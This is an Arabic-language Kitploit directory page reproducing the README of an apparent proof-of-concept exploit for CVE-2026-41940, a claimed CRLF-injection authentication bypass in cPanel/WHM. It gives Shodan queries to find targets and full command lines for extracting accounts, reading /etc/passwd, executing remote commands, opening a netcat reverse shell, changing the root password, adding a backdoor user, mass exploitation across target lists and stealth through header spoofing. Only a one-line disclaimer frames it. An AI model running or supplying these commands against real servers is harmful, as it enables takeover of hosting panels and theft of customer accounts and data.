Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-41940-PoC-Exploit — 🚀 CVE-2026-41940 استغلال تجاوز المصادقة في cPanel/WHM - أفضل سير عمل 💥 يؤدي حقن CRLF إلى تجاوز المصادقة واختطاف الجلسات وتسريب الحسابات. ✅ دعم البروكسي، وكيل مستخدم مخصص، keep-alive، إعادة المحاولات، التحقق من SSL، مخرجات ملونة، والحفظ في ملف. ⚡ إثبات مفهوم (PoC) متقدم لمختبري الاختراق. | Kitploit
أدوات/GitHubGitHub/tc4dy/cve-2026-41940-poc-exploit
المصادقة والترخيصتصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتما بعد الاستغلالاختبار الاختراقالقيادة والسيطرة

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
الفريق الأحمر
تطوير الحمولات
GitHubtc4dy/cve-2026-41940-poc-exploit

CVE-2026-41940-PoC-Exploit

عرض المستودع
928منذ شهر واحدلم تتم المراجعة بعد

حول

🚀 CVE-2026-41940 استغلال تجاوز المصادقة في cPanel/WHM - أفضل سير عمل 💥 يؤدي حقن CRLF إلى تجاوز المصادقة واختطاف الجلسات وتسريب الحسابات. ✅ دعم البروكسي، وكيل مستخدم مخصص، keep-alive، إعادة المحاولات، التحقق من SSL، مخرجات ملونة، والحفظ في ملف. ⚡ إثبات مفهوم (PoC) متقدم لمختبري الاختراق.

مشاركة

CVE-2026-41940

🚀 CVE-2026-41940 - إكسبلويت تجاوز المصادقة في cPanel/WHM

Python License CVSS Pentesting

إصدار cPanel & WHM - حقن CRLF لتجاوز المصادقة واختطاف الجلسة بالكامل

📌 نظرة عامة

يستغل هذا الإكسبلويت CVE-2026-41940، وهي ثغرة حرجة لتجاوز المصادقة في cPanel/WHM. من خلال حقن حمولة CRLF مصمّمة خصيصًا في نظام إدارة الجلسات، يحقق اختطاف الجلسة ووصول الجذر وسيطرة كاملة على لوحة الاستضافة دون أي بيانات اعتماد صالحة.

🔥 الميزات الرئيسية

🎯 الإصدارات المعرّضة للخطر

📍 البحث عبر Shodan

root@kitploit:~
port:2087 "cPanel" "WHM"
port:2083 "cPanel"

⚠️ إخلاء مسؤولية: هذه الأداة مخصصة لاختبارات الأمان المصرّح بها وللأغراض التعليمية فقط. الوصول غير المصرّح به غير قانوني.

📦 التثبيت

root@kitploit:~
# Clone the repository
git clone https://github.com/tc4dy/CVE-2026-41940-POC-Exploit
cd CVE-2026-41940-POC-Exploit

# Install dependencies
pip3 install -r requirements.txt

# Run
python3 exploit.py -t https://example.com:2087

🛠️ أمثلة الاستخدام

root@kitploit:~
# Basic exploitation (extract accounts)
python3 exploit.py -t https://192.168.1.100:2087

# Save accounts to file
python3 exploit.py -t https://192.168.1.100:2087 -o accounts.txt

# Verbose mode (debug output)
python3 exploit.py -t https://192.168.1.100:2087 -v

# Interactive WHM Shell (Recommended)
python3 exploit.py -t https://192.168.1.100:2087 -i

💻 أوامر القشرة التفاعلية

root@kitploit:~
[email protected] $ accounts          # List all cPanel accounts
[email protected] $ version           # Show cPanel version
[email protected] $ ls /home          # List directory
[email protected] $ cat /etc/passwd   # Read file
[email protected] $ exec id           # Execute command
[email protected] $ passwd NewPass123 # Change root password
[email protected] $ adduser test test.com pass123  # Create new user
[email protected] $ exit              # Exit shell

## 🔧 تنفيذ الأوامر عن بُعد

```bash
# Execute single command
python3 exploit.py -t https://192.168.1.100:2087 --cmd "id"
python3 exploit.py -t https://192.168.1.100:2087 --cmd "cat /etc/passwd"
python3 exploit.py -t https://192.168.1.100:2087 --cmd "whoami; hostname; uname -a"


# Read file
python3 exploit.py -t https://192.168.1.100:2087 --read /etc/passwd
python3 exploit.py -t https://192.168.1.100:2087 --read /home/example/config.php

🌐 القشرة العكسية

root@kitploit:~
# Attacker machine (listener)
nc -lvnp 4444

# Exploit (reverse shell)
python3 exploit.py -t https://192.168.1.100:2087 --reverse-shell 10.0.0.1:4444

🔐 عمليات ما بعد الاستغلال

root@kitploit:~
# Change root password
python3 exploit.py -t https://192.168.1.100:2087 --passwd "NewRootPass123!"

# Create new cPanel user
python3 exploit.py -t https://192.168.1.100:2087 --adduser hacker hacker.com Pass1234

# Keep-alive session (maintain access)
python3 exploit.py -t https://192.168.1.100:2087 --no-keep-alive  # Disable auto keep-alive

📊 الاستغلال الجماعي (متعدد الأهداف)

root@kitploit:~
# Create targets file
echo "https://target1.com:2087" > targets.txt
echo "https://target2.com:2087" >> targets.txt
echo "https://10.0.0.5:2087" >> targets.txt

# Mass exploit with 20 threads
python3 exploit.py -l targets.txt --threads 20

# Mass exploit with command execution
python3 exploit.py -l targets.txt --threads 10 --cmd "id"

⚙️ الخيارات المتقدمة

root@kitploit:~
# Custom port (non-standard)
python3 exploit.py -t https://example.com -p 8443

# Using proxy
python3 exploit.py -t https://192.168.1.100:2087 --proxy http://127.0.0.1:8080

# Custom user-agent for stealth
python3 exploit.py -t https://192.168.1.100:2087 -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

# Custom delay and retries
python3 exploit.py -t https://192.168.1.100:2087 --delay 5 --max-retries 5

# SSL verification (ignore self-signed by default)
python3 exploit.py -t https://192.168.1.100:2087 --ssl-verify

📊 وسائط سطر الأوامر

🧪 بيئة الاختبار

Docker (إذا كنت تريد الاختبار بأمان)

docker run -d --name cpanel-test -p 2087:2087 cpanel/cpanel:102

أو باستخدام الإصدار المعرّض للخطر

docker pull cpanel/cpanel:11.102 docker run -d -p 2087:2087 cpanel/cpanel:11.102

🔗 استغلالات ذات صلة

اطّلِع على مستودعات الاستغلال الأخرى الخاصة بي:

  • CVE-2026-24061
  • CVE-2026-0073
  • CVE-2026-29000
تنزيل الأداة
الفئةالميزات
الاستغلال✅ تجاوز المصادقة عبر حقن CRLF
✅ اختطاف جلسة WHM
✅ تسريب رمز الأمان
✅ وصول فوري للجذر
ما بعد الاستغلال✅ استخراج قائمة الحسابات (المستخدم + النطاق)
✅ تنفيذ الأوامر عن بُعد (RCE)
✅ قشرة عكسية (متوافقة مع netcat)
✅ قراءة الملفات (الإعدادات، السجلات، إلخ)
✅ تغيير كلمة مرور الجذر
✅ إنشاء مستخدم cPanel جديد
المسح✅ استغلال هدف واحد
✅ مسح جماعي متعدد الأهداف
✅ تعدد الخيوط (خيوط قابلة للتكوين)
✅ دعم تجاوز المنفذ
التخفي✅ تأخيرات عشوائية بين الطلبات
✅ انتحال X-Forwarded-For
✅ دعم User-Agent مخصص
✅ دعم البروكسي (HTTP/HTTPS)
سهولة الاستخدام✅ قشرة WHM تفاعلية (-i)
✅ مخرجات ملوّنة (colorama)
✅ وضع Verbose/Debug
✅ تصدير قائمة الحسابات إلى ملف
✅ خيط جلسة Keep-Alive
✅ آلية إعادة المحاولة للاتصالات غير المستقرة
المنتجالإصداراتالحالة
cPanel & WHM11.92 - 11.102✅ مؤكّد
cPanel & WHM11.104 - 11.110✅ مؤكّد
cPanel & WHM11.118 - 11.136⚠️ محدود
cPanel & WHM< 11.86✅ ربما معرّض
المختصرالطويلالوصفالافتراضي
-t--targetعنوان URL لهدف واحدمطلوب (هدف واحد)
-l--target-fileملف يحتوي على قائمة الأهدافمطلوب (مسح جماعي)
-p--portتجاوز المنفذكشف تلقائي
-o--outputحفظ قائمة الحسابات في ملفلا شيء
-v--verboseتفعيل مخرجات التصحيحخطأ
-i--interactiveقشرة WHM تفاعليةخطأ
--proxyبروكسي HTTP/HTTPSلا شيء
-ua--user-agentUser-Agent مخصصعشوائي
--cmdتنفيذ أمر واحدلا شيء
--reverse-shellقشرة عكسية IP:PORTلا شيء
--passwdتغيير كلمة مرور الجذرلا شيء
--adduserإنشاء مستخدم جديد (USER DOMAIN PASS)لا شيء
--readقراءة ملف من الهدفلا شيء
--threadsعدد الخيوط للمسح الجماعي10
--delayفاصل Keep-Alive (بالثواني)3.0
--max-retriesالحد الأقصى لإعادة المحاولة لكل طلب3
--no-keep-aliveعدم الحفاظ على الجلسةخطأ
--ssl-verifyالتحقق من شهادات SSLخطأ